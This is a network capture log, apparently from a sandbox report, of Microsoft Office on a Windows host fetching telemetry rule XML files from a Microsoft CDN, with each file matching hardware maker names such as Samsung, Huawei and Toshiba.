                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                      x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221114Z-174f78459684bddphC1EWRbht4000000107000000000en6q
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:14 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      57 | 192.168.2.4 | 49807 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:14 UTC | 192 | OUT | GET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:15 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:14 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                      x-ms-request-id: 2bae3e0a-f01e-0085-5747-4188ea000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221114Z-174f7845968frfdmhC1EWRxxbw00000010mg000000008pad
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:15 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      58 | 192.168.2.4 | 49810 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:14 UTC | 192 | OUT | GET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:15 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:14 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 494
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                      x-ms-request-id: 7090c7f2-e01e-000c-3ea1-428e36000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221114Z-174f7845968n2hr8hC1EWR9cag000000101g00000000qap1
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:15 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID: 59, Source IP: 192.168.2.4, Source Port: 49811, Destination IP: 13.107.246.63, Destination Port: 443

Timestamp: 2024-11-29 22:11:15 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120635v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net

Timestamp: 2024-11-29 22:11:16 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:15 GMT
Content-Type: text/xml
Content-Length: 420
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DAE3EC0"
x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221115Z-174f7845968frfdmhC1EWRxxbw00000010pg000000002v53
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes

Timestamp: 2024-11-29 22:11:16 UTC, Bytes transferred: 420, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


Session ID: 60, Source IP: 192.168.2.4, Source Port: 49812, Destination IP: 13.107.246.63, Destination Port: 443

Timestamp: 2024-11-29 22:11:15 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120636v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net

Timestamp: 2024-11-29 22:11:16 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:16 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D43097E"
x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221116Z-174f7845968qj8jrhC1EWRh41s00000010bg00000000qa98
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes

Timestamp: 2024-11-29 22:11:16 UTC, Bytes transferred: 472, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID: 61, Source IP: 192.168.2.4, Source Port: 49813, Destination IP: 13.107.246.63, Destination Port: 443

Timestamp: 2024-11-29 22:11:16 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120637v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net

Timestamp: 2024-11-29 22:11:17 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:16 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
ETag: "0x8DC582BA909FA21"
x-ms-request-id: 27d1d277-c01e-0014-7129-40a6a3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221116Z-174f7845968n2hr8hC1EWR9cag000000105000000000canv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes

Timestamp: 2024-11-29 22:11:17 UTC, Bytes transferred: 427, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID: 62, Source IP: 192.168.2.4, Source Port: 49814, Destination IP: 13.107.246.63, Destination Port: 443

Timestamp: 2024-11-29 22:11:16 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120638v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net

Timestamp: 2024-11-29 22:11:17 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:17 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
ETag: "0x8DC582B92FCB436"
x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221117Z-174f7845968frfdmhC1EWRxxbw00000010gg00000000fpse
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes

Timestamp: 2024-11-29 22:11:17 UTC, Bytes transferred: 486, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID: 63, Source IP: 192.168.2.4, Source Port: 49815, Destination IP: 13.107.246.63, Destination Port: 443

Timestamp: 2024-11-29 22:11:16 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120639v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net

Timestamp: 2024-11-29 22:11:17 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:17 GMT
Content-Type: text/xml
Content-Length: 423
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
ETag: "0x8DC582BB7564CE8"
x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221117Z-174f78459688l8rvhC1EWRtzr00000000d60000000004twy
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes

Timestamp: 2024-11-29 22:11:17 UTC, Bytes transferred: 423, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


Session ID: 64, Source IP: 192.168.2.4, Source Port: 49816, Destination IP: 13.107.246.63, Destination Port: 443

Timestamp: 2024-11-29 22:11:17 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120640v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net

Timestamp: 2024-11-29 22:11:18 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:18 GMT
Content-Type: text/xml
Content-Length: 478
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
ETag: "0x8DC582B9B233827"
x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221118Z-174f7845968zgtf6hC1EWRqd8s0000000tbg00000000qxag
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes

Timestamp: 2024-11-29 22:11:18 UTC, Bytes transferred: 478, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      65192.168.2.44981713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:18 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:18 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 404
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                      x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221118Z-174f7845968xr5c2hC1EWRd0hn0000000hdg000000006qfs
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:18 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.2.4 | 49821 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:20 UTC | 192 | OUT | GET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:20 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 425
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                      x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f7845968kvnqxhC1EWRmf3g0000000m9g00000000e4xu
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:20 UTC | 425 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.2.4 | 49819 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:20 UTC | 192 | OUT | GET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:20 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 400
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                      x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f78459684bddphC1EWRbht4000000104g00000000pfvp
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:20 UTC | 400 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.4 | 49820 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:20 UTC | 192 | OUT | GET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:20 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 479
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                      x-ms-request-id: 26935917-f01e-0003-011b-414453000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f78459684bddphC1EWRbht4000000105000000000nv78
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:20 UTC | 479 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.4 | 49822 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:20 UTC | 192 | OUT | GET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:20 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 475
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                      x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f7845968zgtf6hC1EWRqd8s0000000th0000000006c8x
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:20 UTC | 475 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.4 | 49818 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:20 UTC | 192 | OUT | GET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:20 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                      x-ms-request-id: 490736a9-701e-0097-7e01-42b8c1000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f78459684bddphC1EWRbht400000010ag000000004qta
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:20 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.2.4 | 49823 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:22 UTC | 192 | OUT | GET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 448
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                      x-ms-request-id: c6635303-801e-0083-091e-41f0ae000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f7845968jrjrxhC1EWRmmrs00000010t0000000000z43
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:22 UTC | 448 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       72 | 192.168.2.4 | 49824 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:22 UTC | 192 | OUT | GET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 491
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                      x-ms-request-id: 5cf18591-601e-000d-7e91-3f2618000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f7845968j6t2phC1EWRcfe800000010q000000000agdk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:22 UTC | 491 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       73 | 192.168.2.4 | 49825 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:22 UTC | 192 | OUT | GET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:23 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 416
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                      x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f7845968psccphC1EWRuz9s00000010qg00000000m98k
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:23 UTC | 416 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       74 | 192.168.2.4 | 49826 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:22 UTC | 192 | OUT | GET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:23 UTC | 471 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 479
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                      x-ms-request-id: 83b34a83-b01e-0053-35ab-42cdf8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f78459684db9fhC1EWRc7g400000000fg000000003127
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
